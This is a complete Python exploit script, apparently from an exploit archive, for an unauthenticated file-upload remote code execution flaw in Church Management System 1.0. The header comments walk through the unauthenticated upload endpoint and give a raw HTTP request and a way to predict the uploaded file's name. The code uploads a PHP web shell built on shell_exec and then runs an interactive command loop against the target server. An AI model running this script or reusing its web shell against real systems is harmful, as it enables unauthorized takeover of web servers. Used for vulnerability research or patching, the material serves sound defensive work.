5cc446a25f
6 changes to exploits/shellcodes T-Soft E-Commerce 4 - change 'admin credentials' Cross-Site Request Forgery (CSRF) Church Management System 1.0 - 'search' SQL Injection (Unauthenticated) WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Budget and Expense Tracker System 1.0 - Authenticated Bypass
193 lines
No EOL
7.4 KiB
Python
Executable file
193 lines
No EOL
7.4 KiB
Python
Executable file
# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
|
|
# Exploit Author: Abdullah Khawaja
|
|
# Date: 2021-09-20
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
|
|
# Version: 1.0
|
|
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
|
|
# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
|
|
|
|
# Exploit Details:
|
|
|
|
# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
|
|
# 2. Set the 'f' parameter of the POST request to 'save'.
|
|
# - `Users.php?f=save`
|
|
# 3. Capture request in burp and replace with with following request.
|
|
'''
|
|
POST /church_management/classes/Users.php?f=save HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
|
|
Accept: */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
|
|
Content-Length: 859
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/church_management/admin/?page=user
|
|
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
|
|
-----------------------------91105564325608762312322546550
|
|
Content-Disposition: form-data; name="id"
|
|
|
|
1
|
|
-----------------------------91105564325608762312322546550
|
|
Content-Disposition: form-data; name="firstname"
|
|
|
|
Adminstrator
|
|
-----------------------------91105564325608762312322546550
|
|
Content-Disposition: form-data; name="lastname"
|
|
|
|
Admin
|
|
-----------------------------91105564325608762312322546550
|
|
Content-Disposition: form-data; name="username"
|
|
|
|
admin
|
|
-----------------------------91105564325608762312322546550
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
|
|
-----------------------------91105564325608762312322546550
|
|
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
|
|
Content-Type: application/octet-stream
|
|
|
|
<?php echo phpinfo(); ?>
|
|
-----------------------------91105564325608762312322546550--
|
|
|
|
'''
|
|
# ` Image uploader is renaming your payload using the following function.
|
|
# strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
|
|
# you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
|
|
# and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
|
|
# concate output with your playload name like this 1632085200_phpinfo.php
|
|
# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.
|
|
|
|
# RCE via executing exploit:
|
|
# Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
|
|
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/
|
|
|
|
|
|
import requests, sys, urllib, re
|
|
import datetime
|
|
from colorama import Fore, Back, Style
|
|
|
|
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
|
|
|
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
|
|
|
|
print(Style.BRIGHT+" Church Management System v1.0")
|
|
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
|
|
print(header)
|
|
|
|
print(r"""
|
|
|
|
|
|
.----------.
|
|
.-''-. / /
|
|
. __ __ ___ .' .-. ) / ______.'
|
|
.'| | |/ `.' `. / .' / / / /_
|
|
.' | | .-. .-. ' (_/ / / / '''--.
|
|
< | __ __ | | | | | | ,.----------. / / '___ `.
|
|
| | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. |
|
|
| | \ .' / | \ | / | \ || | | | | |\\ /. ' ) |
|
|
| |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' /
|
|
| /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'`
|
|
| | \ \ / / | |_/ / | |_ / /.-'_.' '------'''
|
|
' \ \ \ \ \._,\ '/\ \._,\ '/ / _.'
|
|
'------' '---'`--' `" `--' `" ( _.-'
|
|
|
|
abdullahkhawaja.com
|
|
""")
|
|
|
|
|
|
|
|
GREEN = '\033[32m' # Green Text
|
|
RED = '\033[31m' # Red Text
|
|
RESET = '\033[m' # reset to the defaults
|
|
#Create a new session
|
|
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
|
|
|
|
|
|
|
|
s = requests.Session()
|
|
|
|
|
|
|
|
#Set Cookie
|
|
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
|
|
|
|
LINK=input("Enter URL of The Vulnarable Application : ")
|
|
|
|
|
|
def webshell(LINK, session):
|
|
try:
|
|
WEB_SHELL = LINK+'uploads/'+filename
|
|
getdir = {'cmd': 'echo %CD%'}
|
|
r2 = session.get(WEB_SHELL, params=getdir, verify=False)
|
|
status = r2.status_code
|
|
if status != 200:
|
|
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
|
|
r2.raise_for_status()
|
|
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
|
|
cwd = re.findall('[CDEF].*', r2.text)
|
|
cwd = cwd[0]+"> "
|
|
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
|
|
while True:
|
|
thought = input(term)
|
|
command = {'cmd': thought}
|
|
r2 = requests.get(WEB_SHELL, params=command, verify=False)
|
|
status = r2.status_code
|
|
if status != 200:
|
|
r2.raise_for_status()
|
|
response2 = r2.text
|
|
print(response2)
|
|
except:
|
|
print("\r\nExiting.")
|
|
sys.exit(-1)
|
|
|
|
|
|
#Creating a PHP Web Shell
|
|
|
|
phpshell = {
|
|
'img':
|
|
(
|
|
'shell.php',
|
|
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
|
|
'application/octet-stream',
|
|
{'Content-Disposition': 'form-data'}
|
|
)
|
|
}
|
|
|
|
# Defining value for form data
|
|
data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}
|
|
|
|
|
|
def id_generator():
|
|
x = datetime.datetime.now()
|
|
date_string = x.strftime("%y-%m-%d %H:%M")
|
|
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
|
|
timestamp = datetime.datetime.timestamp(date)
|
|
file = int(timestamp)
|
|
final_name = str(file)+'_shell.php'
|
|
return final_name
|
|
|
|
filename = id_generator()
|
|
#Uploading Reverse Shell
|
|
print("[*]Uploading PHP Shell For RCE...")
|
|
upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)
|
|
|
|
shell_upload = True if("Undefined index: id in" in upload.text) else False
|
|
u=shell_upload
|
|
if u:
|
|
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
|
|
else:
|
|
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
|
|
|
|
|
|
|
|
#Executing The Webshell
|
|
webshell(LINK, s) |